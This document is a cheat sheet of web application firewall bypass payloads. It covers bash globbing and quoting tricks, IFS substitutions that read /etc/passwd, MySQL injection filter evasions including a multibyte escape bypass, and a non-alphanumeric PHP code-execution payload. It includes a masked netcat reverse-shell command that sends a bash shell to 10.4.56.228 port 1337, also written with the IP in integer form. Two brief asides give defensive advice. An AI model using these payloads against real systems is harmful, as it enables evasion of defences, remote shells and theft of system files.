Some web application firewall bypasses
Bash globbing
Listing via echo
echo /*
Exec masked command
/???/?????/???/n? -e /???/b??h 168048868 1337 &
<=>
/usr/local/bin/nc -e /bin/bash 10.4.56.228 1337 &
Quote marks
/b'i'n/c'a't /e't'c/pa's's'wd'
Using IP address in long form
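10.4.56.228 == 168048868 (10*2^24 + 4*2^16 + 56*2^8 + 228); rules and log searches that match dotted-quad addresses need to canonicalise the integer form first.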
Exclude spaces
IFS=,;`cat<<<cat,/etc/passwd`
IFS=,;$(cat<<<cat,/etc/passwd)
cat$IFS/etc/passwd
cat</etc/passwd
{cat,/etc/passwd}
MySQL
Whitespaces:
- %0c = form feed, new page
- %09 = horizontal tab
- %0d = carriage return
- %0a = line feed, new line
- %0b = vertical tab
- %a0 = non-breaking space (in Latin-1)
SELECT/*some*/1/*some*/FROM/*some*/users
SELECT(1)FROM(information_schema.tables)
x'31'=1
x'31' like 1
0b1010=10
12 rlike 1
('o')rlike('o')
SELECT CHAR(0x66)
SELECT 0x5045
SELECT 0x50 + 0x45
SELECT user FROM mysql.user;
Comments
SELECT/*sometext*/user FROM mysql/*sometext*/.user;
Whitespaces
SEL\nECT user FR\tOM mys\xql.user;
Multibyte encodings (SJIS, BIG5, GBK…)
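%bf%27 -> escape -> 0xbf5c'
%a3%27 -> escape -> 0xa35c'
(The escaping routine puts a backslash, 0x5c, in front of the quote; a multibyte charset can then read 0xbf5c or 0xa35c as a single character, which leaves the quote unescaped. Parameterised queries avoid the escaping step altogether; where escaping is kept, the connection charset has to be set through the driver API so the escaping routine knows it.)
Comma filter bypass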
select 1,2,3 <=> select * from (Select 1)a join(Select 2)b join(Select 3)c;
select 1,2,3 <=> sElecT * froM (sElecT 1) As a JoIn (sElecT 2) aS b JoIn (sElecT 3) AS c;
select substr('hack',1,1);
select substr('hack' from 1 FoR 1);
PHP
Use non-alphanumeric payloads
$_='$<>/'^'{{{{';${$_}[_](${$_}[__]);
<=>
$_GET['_']($_GET['__']);